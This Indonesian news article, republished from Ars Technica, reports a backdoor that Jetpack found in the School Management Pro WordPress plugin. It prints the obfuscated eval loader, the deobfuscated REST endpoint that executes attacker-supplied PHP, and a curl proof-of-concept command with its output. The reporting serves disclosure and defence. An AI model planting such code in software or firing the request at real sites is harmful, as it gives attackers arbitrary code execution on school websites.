World

Peneliti menemukan pintu belakang bersembunyi di plugin WordPress yang digunakan oleh sekolah


Sebuah pintu kartun mengarah ke dinding kode komputer.

Para peneliti mengatakan pada hari Jumat bahwa mereka menemukan backdoor berbahaya di plugin WordPress yang memberi penyerang kendali penuh atas situs web yang menggunakan paket tersebut, yang dipasarkan ke sekolah.

Versi premium dari School Management, plugin yang digunakan sekolah untuk mengoperasikan dan mengelola situs web mereka, telah berisi pintu belakang setidaknya sejak versi 8.9, kata peneliti di layanan keamanan situs web Jetpack dalam sebuah posting blog tanpa mengesampingkan bahwa itu telah ada di versi sebelumnya. . Halaman ini dari situs pihak ketiga menunjukkan bahwa versi 8.9 dirilis Agustus lalu.

Pintu belakang yang jelas

Jetpack mengatakan telah menemukan pintu belakang setelah anggota tim dukungan di WordPress.com melaporkan menemukan kode yang sangat dikaburkan di beberapa situs yang menggunakan School Management Pro. Setelah mengaburkannya, mereka menyadari bahwa kode, yang disimpan di bagian pemeriksaan lisensi dari plugin, sengaja ditempatkan di sana dengan tujuan memberi orang luar kemampuan untuk mengendalikan situs.

“Kode itu sendiri tidak terlalu menarik: itu adalah pintu belakang yang jelas disuntikkan ke dalam kode pengecekan lisensi plugin,” kata posting Jetpack. “Ini memungkinkan penyerang untuk mengeksekusi kode PHP sewenang-wenang di situs dengan plugin terpasang.”

Dalam bentuknya yang dikaburkan, kodenya terlihat seperti ini:

}
$_fc = eval("\x65\x76\x61\x6c(\x67\x7a".chr($_x = 0x70 - 7).chr($_x += 5).chr($_x -= 8) . "\x6c\x61\x74" . "\x65\x28\x62"."\x61\x73\x65\x36"."\x34\x5f\x64\x65\x63\x6f\x64\x65\x28'fY9BasMwEEXX8ikmECIbnAukJJAW77ooSaCLUsTYHjsilu2O5JRQfPdKDs2mbbTQQu/9mS8sS4WF010bg2SyTmGvlW61kylUQ3tFCXxFgqnW1hGrSeNucBRHQkg0S0MmJ/YJ2eiCWksy9QSZ8RIUIQ25Y1daCbDewOuL2mX7g9oTn4lXq6ddtj1sH5+zdHILbJoci5MM7q0CzJk+Br8ZpjL+zJFrC+sbWG5qcqpHRmPj5GFydAUxaGvJ+QHBf5N5031W2h7lu5+0WMAMyPTu8i//I303OsGfjoLO2Pzm13JjuMfw6SQS/m304Bs="" . str_repeat(chr(0x29), 3)."\x3b");
class WLSM_Crypt_Blowfish_DefaultKey

Setelah deobfuscation, kodenya adalah:

add_action( "rest_api_init', function() {
        register_rest_route(
                'am-member', 'license',
                array(
                        'methods'  => WP_REST_Server::CREATABLE,
                        'callback' => function( $request ) {
                                $args = $request->get_params();
                                if ( isset( $args['blowfish'] ) && ! empty( $args['blowfish'] ) && isset( $args['blowf'] ) && ! empty( $args['blowf'] ) ) {
                                        eval( $args['blowf'] );
                                }
                        },
                )
        );
} );

Para peneliti menulis eksploit bukti konsep yang mengonfirmasi bahwa kode yang dikaburkan memang merupakan pintu belakang yang memungkinkan siapa pun yang mengetahuinya untuk mengeksekusi kode pilihan mereka di situs mana pun yang menjalankan plugin.

$ curl -s -d 'blowfish=1' -d "blowf=system('id');" '
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Warning: Cannot modify header information - headers already sent by (output started at /var/www/html/wp-content/plugins/school-management-pro-9.9.4/admin/inc/manager/WLSM_LC.php(683) : eval()'d code(1) : eval()'d code(9) : eval()'d code:1) in /var/www/html/wp-includes/rest-api/class-wp-rest-server.php on line 1713

Misteri tetap ada

Tidak jelas berapa banyak situs yang menggunakan plugin tersebut. Weblizar, pembuat School Management yang berbasis di India, mengatakan di berandanya bahwa ia memiliki “340k+” pelanggan untuk tema dan plugin gratis dan premiumnya, tetapi pintu belakang yang ditemukan Jetpack hanya di School Management Pro. Pintu belakang tidak ada dalam versi gratis dari plugin, dan tidak ada indikasi bahwa itu dimasukkan ke dalam plugin lain yang diterbitkan Weblizar.

“Kami telah mencoba untuk mendapatkan lebih banyak informasi dari vendor tentang kapan backdoor disuntikkan, versi apa yang terpengaruh, dan bagaimana kode tersebut berakhir di plugin,” kata posting tersebut. “Upaya ini tidak berhasil, karena vendor mengatakan mereka tidak tahu kapan atau bagaimana kode itu masuk ke perangkat lunak mereka.”

Upaya untuk mencapai Weblizar tidak berhasil.

Sekarang kehadiran pintu belakang adalah pengetahuan publik, penyerang cenderung mengeksploitasinya di situs web mana pun menggunakan versi plugin yang rentan. Siapa pun yang menggunakan plugin ini harus segera memperbarui. Bahkan setelah patch, mereka juga harus hati-hati memindai situs mereka untuk tanda-tanda kompromi, karena pembaruan tidak akan menghapus backdoor baru yang mungkin telah ditambahkan.

Artikel ini telah tayang pertama kali di situs arstechnica.com

Related Articles

Tinggalkan Balasan

Alamat email Anda tidak akan dipublikasikan. Ruas yang wajib ditandai *

Back to top button